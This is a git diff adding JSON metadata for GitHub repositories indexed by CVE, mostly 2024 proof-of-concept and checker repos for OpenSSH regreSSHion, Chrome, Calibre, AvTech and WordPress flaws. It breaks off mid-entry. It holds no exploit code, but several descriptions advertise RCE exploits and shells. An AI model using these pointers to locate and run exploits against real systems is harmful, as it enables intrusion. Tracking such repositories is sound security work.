"public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 833415966, + "name": "CVE-2024-6387", + "full_name": "prelearn-code\/CVE-2024-6387", + "owner": { + "login": "prelearn-code", + "id": 175189722, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/175189722?v=4", + "html_url": "https:\/\/github.com\/prelearn-code", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/prelearn-code\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-25T02:32:19Z", + "updated_at": "2024-08-06T14:08:36Z", + "pushed_at": "2024-07-25T02:37:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835582804, + "name": "CVE-2024-6387", + "full_name": "l-urk\/CVE-2024-6387", + "owner": { + "login": "l-urk", + "id": 112792604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112792604?v=4", + "html_url": "https:\/\/github.com\/l-urk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l-urk\/CVE-2024-6387", + "description": "Proof of concept python script for regreSSHion exploit. ", + "fork": false, + "created_at": "2024-07-30T06:13:11Z", + "updated_at": "2024-11-20T12:28:26Z", + "pushed_at": "2024-10-19T04:58:22Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": true, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 836283983, + "name": "ssh_poc2024", + "full_name": "alex14324\/ssh_poc2024", + "owner": { + "login": "alex14324", + "id": 36421715, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36421715?v=4", + "html_url": "https:\/\/github.com\/alex14324", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alex14324\/ssh_poc2024", + "description": "An exploit for CVE-2024-6387, targeting a signal handler race condition in OpenSSH's server ", + "fork": false, + "created_at": "2024-07-31T14:19:19Z", + "updated_at": "2024-07-31T14:20:46Z", + "pushed_at": "2024-07-31T14:19:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 838725789, + "name": "CVE-2023-4596-OpenSSH-Multi-Checker", + "full_name": "X-Projetion\/CVE-2023-4596-OpenSSH-Multi-Checker", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2023-4596-OpenSSH-Multi-Checker", + "description": "CVE-2024-6387-checker is a tool or script designed to detect the security vulnerability known as CVE-2024-6387 OpenSSH. CVE-2024-6387 OpenSSH is an entry in the Common Vulnerabilities and Exposures (CVE) that documents security weaknesses discovered in certain software or systems.", + "fork": false, + "created_at": "2024-08-06T08:12:48Z", + "updated_at": "2024-08-10T11:17:27Z", + "pushed_at": "2024-08-06T08:27:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844630300, + "name": "CVE-2024-6387-Race-Condition-in-Signal-Handling-for-OpenSSH", + "full_name": "s1d6point7bugcrowd\/CVE-2024-6387-Race-Condition-in-Signal-Handling-for-OpenSSH", + "owner": { + "login": "s1d6point7bugcrowd", + "id": 163605035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163605035?v=4", + "html_url": "https:\/\/github.com\/s1d6point7bugcrowd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s1d6point7bugcrowd\/CVE-2024-6387-Race-Condition-in-Signal-Handling-for-OpenSSH", + "description": null, + "fork": false, + "created_at": "2024-08-19T16:45:53Z", + "updated_at": "2024-08-19T16:47:17Z", + "pushed_at": "2024-08-19T16:47:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844959580, + "name": "OpenSSH-CVE-2024-6387-Fix", + "full_name": "almogopp\/OpenSSH-CVE-2024-6387-Fix", + "owner": { + "login": "almogopp", + "id": 37026702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37026702?v=4", + "html_url": "https:\/\/github.com\/almogopp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/almogopp\/OpenSSH-CVE-2024-6387-Fix", + "description": "A Bash script to mitigate the CVE-2024-6387 vulnerability in OpenSSH by providing an option to upgrade to a secure version or apply a temporary workaround. This repository helps secure systems against potential remote code execution risks associated with affected OpenSSH versions.", + "fork": false, + "created_at": "2024-08-20T09:57:24Z", + "updated_at": "2024-08-20T09:58:35Z", + "pushed_at": "2024-08-20T09:58:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847548583, + "name": "CVE-2024-6387_Check", + "full_name": "HadesNull123\/CVE-2024-6387_Check", + "owner": { + "login": "HadesNull123", + "id": 56301165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56301165?v=4", + "html_url": "https:\/\/github.com\/HadesNull123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HadesNull123\/CVE-2024-6387_Check", + "description": "RCE OpenSSH CVE-2024-6387 Check and Exploit", + "fork": false, + "created_at": "2024-08-26T04:40:27Z", + "updated_at": "2024-08-26T04:41:05Z", + "pushed_at": "2024-08-26T04:41:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848825194, + "name": "CVE-2024-6387-Vulnerability-Checker", + "full_name": "identity-threat-labs\/CVE-2024-6387-Vulnerability-Checker", + "owner": { + "login": "identity-threat-labs", + "id": 179711116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179711116?v=4", + "html_url": "https:\/\/github.com\/identity-threat-labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/identity-threat-labs\/CVE-2024-6387-Vulnerability-Checker", + "description": "This Python script checks for the CVE-2024-6387 vulnerability in OpenSSH servers. It supports multiple IP addresses, URLs, CIDR ranges, and ports. The script can also read addresses from a file.", + "fork": false, + "created_at": "2024-08-28T13:28:08Z", + "updated_at": "2024-10-31T05:34:32Z", + "pushed_at": "2024-08-29T14:52:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 849418620, + "name": "Article-RegreSSHion-CVE-2024-6387", + "full_name": "identity-threat-labs\/Article-RegreSSHion-CVE-2024-6387", + "owner": { + "login": "identity-threat-labs", + "id": 179711116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179711116?v=4", + "html_url": "https:\/\/github.com\/identity-threat-labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/identity-threat-labs\/Article-RegreSSHion-CVE-2024-6387", + "description": "In an era where digital security is crucial, a new vulnerability in OpenSSH, identified as CVE-2024-6387, has drawn the attention of system administrators and security professionals worldwide. Named \"regreSSHion,\" this severe security flaw allows remote code execution (RCE) and could significant threat to the integrity of vulnerable systems.", + "fork": false, + "created_at": "2024-08-29T15:00:56Z", + "updated_at": "2024-09-04T16:27:20Z", + "pushed_at": "2024-08-29T15:06:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 876504709, + "name": "CVE-2024-6387-poc-1", + "full_name": "anhvutuan\/CVE-2024-6387-poc-1", + "owner": { + "login": "anhvutuan", + "id": 74167929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74167929?v=4", + "html_url": "https:\/\/github.com\/anhvutuan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anhvutuan\/CVE-2024-6387-poc-1", + "description": "CVE-2024-6387, also known as RegreSSHion, is a high-severity vulnerability found in OpenSSH servers (sshd) running on glibc-based Linux systems. It is a regression of a previously fixed vulnerability (CVE-2006-5051), which means the issue was reintroduced in newer versions of OpenSSH.", + "fork": false, + "created_at": "2024-10-22T04:50:10Z", + "updated_at": "2024-10-22T04:50:10Z", + "pushed_at": "2024-07-11T14:59:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 893527608, + "name": "CVE-2024-6387", + "full_name": "YassDEV221608\/CVE-2024-6387", + "owner": { + "login": "YassDEV221608", + "id": 145906163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145906163?v=4", + "html_url": "https:\/\/github.com\/YassDEV221608", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YassDEV221608\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-11-24T17:12:26Z", + "updated_at": "2024-11-24T17:14:33Z", + "pushed_at": "2024-11-24T17:14:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 905536150, + "name": "CVE-2024-6387", + "full_name": "zql-gif\/CVE-2024-6387", + "owner": { + "login": "zql-gif", + "id": 84617316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84617316?v=4", + "html_url": "https:\/\/github.com\/zql-gif", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zql-gif\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-12-19T03:08:19Z", + "updated_at": "2024-12-19T06:49:55Z", + "pushed_at": "2024-12-19T06:49:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 905684125, + "name": "test_for6387", + "full_name": "awusan125\/test_for6387", + "owner": { + "login": "awusan125", + "id": 74240688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74240688?v=4", + "html_url": "https:\/\/github.com\/awusan125", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/awusan125\/test_for6387", + "description": "test code for cve-2024-6387", + "fork": false, + "created_at": "2024-12-19T10:16:45Z", + "updated_at": "2024-12-22T08:24:49Z", + "pushed_at": "2024-12-22T08:24:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 911826074, + "name": "CVE-2024-6387_PoC", + "full_name": "YassDEV221608\/CVE-2024-6387_PoC", + "owner": { + "login": "YassDEV221608", + "id": 145906163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145906163?v=4", + "html_url": "https:\/\/github.com\/YassDEV221608", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YassDEV221608\/CVE-2024-6387_PoC", + "description": null, + "fork": false, + "created_at": "2025-01-04T00:25:33Z", + "updated_at": "2025-01-07T13:13:10Z", + "pushed_at": "2025-01-04T00:37:14Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6473.json b/2024/CVE-2024-6473.json new file mode 100644 index 0000000000..c8708f0e72 --- /dev/null +++ b/2024/CVE-2024-6473.json @@ -0,0 +1,40 @@ +[ + { + "id": 882188373, + "name": "CVE-2024-6473-PoC", + "full_name": "12345qwert123456\/CVE-2024-6473-PoC", + "owner": { + "login": "12345qwert123456", + "id": 63474188, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63474188?v=4", + "html_url": "https:\/\/github.com\/12345qwert123456", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/12345qwert123456\/CVE-2024-6473-PoC", + "description": "Proof of concept (exploit) for CVE-2024-6473", + "fork": false, + "created_at": "2024-11-02T05:37:30Z", + "updated_at": "2024-11-20T16:31:09Z", + "pushed_at": "2024-11-02T05:55:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "browser", + "cve", + "dll-hijacking", + "exploit", + "poc", + "yandex" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6529.json b/2024/CVE-2024-6529.json new file mode 100644 index 0000000000..6b8d407751 --- /dev/null +++ b/2024/CVE-2024-6529.json @@ -0,0 +1,33 @@ +[ + { + "id": 837367811, + "name": "CVE-2024-6529", + "full_name": "Abdurahmon3236\/CVE-2024-6529", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-6529", + "description": null, + "fork": false, + "created_at": "2024-08-02T20:02:39Z", + "updated_at": "2024-08-02T20:03:11Z", + "pushed_at": "2024-08-02T20:03:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6536.json b/2024/CVE-2024-6536.json new file mode 100644 index 0000000000..e3d6157d3e --- /dev/null +++ b/2024/CVE-2024-6536.json @@ -0,0 +1,33 @@ +[ + { + "id": 836289886, + "name": "CVE-2024-6536", + "full_name": "apena-ba\/CVE-2024-6536", + "owner": { + "login": "apena-ba", + "id": 113431512, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113431512?v=4", + "html_url": "https:\/\/github.com\/apena-ba", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/apena-ba\/CVE-2024-6536", + "description": null, + "fork": false, + "created_at": "2024-07-31T14:31:56Z", + "updated_at": "2024-08-28T06:24:13Z", + "pushed_at": "2024-07-31T15:11:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6592.json b/2024/CVE-2024-6592.json new file mode 100644 index 0000000000..155938fb8e --- /dev/null +++ b/2024/CVE-2024-6592.json @@ -0,0 +1,33 @@ +[ + { + "id": 858770133, + "name": "watchguard-sso-client", + "full_name": "RedTeamPentesting\/watchguard-sso-client", + "owner": { + "login": "RedTeamPentesting", + "id": 34096076, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34096076?v=4", + "html_url": "https:\/\/github.com\/RedTeamPentesting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RedTeamPentesting\/watchguard-sso-client", + "description": "Client Implementation for the WatchGuard SSO Agent Protocol used for Security Research (CVE-2024-6592, CVE-2024-6593, CVE-2024-6594)", + "fork": false, + "created_at": "2024-09-17T14:01:10Z", + "updated_at": "2024-10-16T14:10:37Z", + "pushed_at": "2024-09-17T14:12:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6624.json b/2024/CVE-2024-6624.json new file mode 100644 index 0000000000..0cf7da58ae --- /dev/null +++ b/2024/CVE-2024-6624.json @@ -0,0 +1,36 @@ +[ + { + "id": 855156513, + "name": "CVE-2024-6624", + "full_name": "RandomRobbieBF\/CVE-2024-6624", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-6624", + "description": "JSON API User <= 3.9.3 - Unauthenticated Privilege Escalation", + "fork": false, + "created_at": "2024-09-10T12:08:55Z", + "updated_at": "2024-10-18T17:57:38Z", + "pushed_at": "2024-09-10T12:11:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "json-api-user", + "wordpress" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6670.json b/2024/CVE-2024-6670.json new file mode 100644 index 0000000000..b74c1b0fcb --- /dev/null +++ b/2024/CVE-2024-6670.json @@ -0,0 +1,33 @@ +[ + { + "id": 850000973, + "name": "CVE-2024-6670", + "full_name": "sinsinology\/CVE-2024-6670", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-6670", + "description": null, + "fork": false, + "created_at": "2024-08-30T17:13:14Z", + "updated_at": "2024-12-30T03:37:03Z", + "pushed_at": "2024-08-30T17:22:31Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 34, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6768.json b/2024/CVE-2024-6768.json new file mode 100644 index 0000000000..6b8094e59c --- /dev/null +++ b/2024/CVE-2024-6768.json @@ -0,0 +1,33 @@ +[ + { + "id": 830402554, + "name": "CVE-2024-6768", + "full_name": "fortra\/CVE-2024-6768", + "owner": { + "login": "fortra", + "id": 117669217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117669217?v=4", + "html_url": "https:\/\/github.com\/fortra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fortra\/CVE-2024-6768", + "description": null, + "fork": false, + "created_at": "2024-07-18T07:52:46Z", + "updated_at": "2024-12-26T12:51:10Z", + "pushed_at": "2024-08-12T20:48:52Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6769.json b/2024/CVE-2024-6769.json new file mode 100644 index 0000000000..09852dc447 --- /dev/null +++ b/2024/CVE-2024-6769.json @@ -0,0 +1,33 @@ +[ + { + "id": 849466467, + "name": "CVE-2024-6769", + "full_name": "fortra\/CVE-2024-6769", + "owner": { + "login": "fortra", + "id": 117669217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117669217?v=4", + "html_url": "https:\/\/github.com\/fortra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fortra\/CVE-2024-6769", + "description": "Activation cache poisoning to elevate from medium to high integrity (CVE-2024-6769)", + "fork": false, + "created_at": "2024-08-29T16:40:49Z", + "updated_at": "2025-01-06T10:05:17Z", + "pushed_at": "2024-09-29T21:58:19Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 59, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6778.json b/2024/CVE-2024-6778.json new file mode 100644 index 0000000000..8af3f07cc5 --- /dev/null +++ b/2024/CVE-2024-6778.json @@ -0,0 +1,64 @@ +[ + { + "id": 855008152, + "name": "CVE-2024-6778-POC", + "full_name": "ading2210\/CVE-2024-6778-POC", + "owner": { + "login": "ading2210", + "id": 71154407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71154407?v=4", + "html_url": "https:\/\/github.com\/ading2210", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ading2210\/CVE-2024-6778-POC", + "description": "A POC exploit for CVE-2024-5836 and CVE-2024-6778, allowing for a sandbox escape from a Chrome extension. ", + "fork": false, + "created_at": "2024-09-10T06:27:59Z", + "updated_at": "2024-12-21T06:44:02Z", + "pushed_at": "2024-10-17T05:12:29Z", + "stargazers_count": 84, + "watchers_count": 84, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 84, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 875609314, + "name": "POC-CVE-2024-6778", + "full_name": "r00tjunip3r1\/POC-CVE-2024-6778", + "owner": { + "login": "r00tjunip3r1", + "id": 185687343, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/185687343?v=4", + "html_url": "https:\/\/github.com\/r00tjunip3r1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r00tjunip3r1\/POC-CVE-2024-6778", + "description": null, + "fork": false, + "created_at": "2024-10-20T12:47:53Z", + "updated_at": "2024-10-22T21:30:49Z", + "pushed_at": "2024-10-20T12:50:33Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6782.json b/2024/CVE-2024-6782.json new file mode 100644 index 0000000000..d6bdcc6c2e --- /dev/null +++ b/2024/CVE-2024-6782.json @@ -0,0 +1,126 @@ +[ + { + "id": 838914336, + "name": "CVE-2024-6782", + "full_name": "zangjiahe\/CVE-2024-6782", + "owner": { + "login": "zangjiahe", + "id": 49680446, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49680446?v=4", + "html_url": "https:\/\/github.com\/zangjiahe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zangjiahe\/CVE-2024-6782", + "description": "Calibre 远程代码执行(CVE-2024-6782)Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution.", + "fork": false, + "created_at": "2024-08-06T15:31:48Z", + "updated_at": "2024-11-20T16:30:59Z", + "pushed_at": "2024-08-06T15:35:37Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840181130, + "name": "CVE-2024-6782", + "full_name": "jdpsl\/CVE-2024-6782", + "owner": { + "login": "jdpsl", + "id": 8251941, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8251941?v=4", + "html_url": "https:\/\/github.com\/jdpsl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jdpsl\/CVE-2024-6782", + "description": "Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution.", + "fork": false, + "created_at": "2024-08-09T06:25:03Z", + "updated_at": "2024-10-21T13:18:00Z", + "pushed_at": "2024-08-09T06:26:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 857843697, + "name": "CVE-2024-6782-PoC", + "full_name": "0xB0y426\/CVE-2024-6782-PoC", + "owner": { + "login": "0xB0y426", + "id": 132174647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132174647?v=4", + "html_url": "https:\/\/github.com\/0xB0y426", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xB0y426\/CVE-2024-6782-PoC", + "description": "Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.", + "fork": false, + "created_at": "2024-09-15T18:45:44Z", + "updated_at": "2024-10-21T13:18:02Z", + "pushed_at": "2024-09-16T01:37:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 899960330, + "name": "CVE-2024-6782", + "full_name": "NketiahGodfred\/CVE-2024-6782", + "owner": { + "login": "NketiahGodfred", + "id": 78810041, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78810041?v=4", + "html_url": "https:\/\/github.com\/NketiahGodfred", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NketiahGodfred\/CVE-2024-6782", + "description": "Calibre Remote Code Execution", + "fork": false, + "created_at": "2024-12-07T13:42:45Z", + "updated_at": "2024-12-07T13:43:33Z", + "pushed_at": "2024-12-07T13:43:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7029.json b/2024/CVE-2024-7029.json new file mode 100644 index 0000000000..9937978cc7 --- /dev/null +++ b/2024/CVE-2024-7029.json @@ -0,0 +1,104 @@ +[ + { + "id": 849769018, + "name": "CVE-2024-7029-EXPLOIT", + "full_name": "bigherocenter\/CVE-2024-7029-EXPLOIT", + "owner": { + "login": "bigherocenter", + "id": 117562871, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117562871?v=4", + "html_url": "https:\/\/github.com\/bigherocenter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigherocenter\/CVE-2024-7029-EXPLOIT", + "description": null, + "fork": false, + "created_at": "2024-08-30T07:58:27Z", + "updated_at": "2024-09-13T16:27:20Z", + "pushed_at": "2024-08-29T17:41:35Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 851043760, + "name": "CVE-2024-7029", + "full_name": "ebrasha\/CVE-2024-7029", + "owner": { + "login": "ebrasha", + "id": 9009001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9009001?v=4", + "html_url": "https:\/\/github.com\/ebrasha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ebrasha\/CVE-2024-7029", + "description": "A PoC tool for exploiting CVE-2024-7029 in AvTech devices, enabling RCE, vulnerability scanning, and an interactive shell.", + "fork": false, + "created_at": "2024-09-02T10:16:49Z", + "updated_at": "2024-11-20T19:07:31Z", + "pushed_at": "2024-09-02T11:43:07Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": true, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "abdal-security-group", + "avtech", + "cctv", + "cve-2024-7029", + "ebrasha", + "exploit", + "poc", + "remote-code-execution" + ], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869446465, + "name": "CVE-2024-7029", + "full_name": "geniuszly\/CVE-2024-7029", + "owner": { + "login": 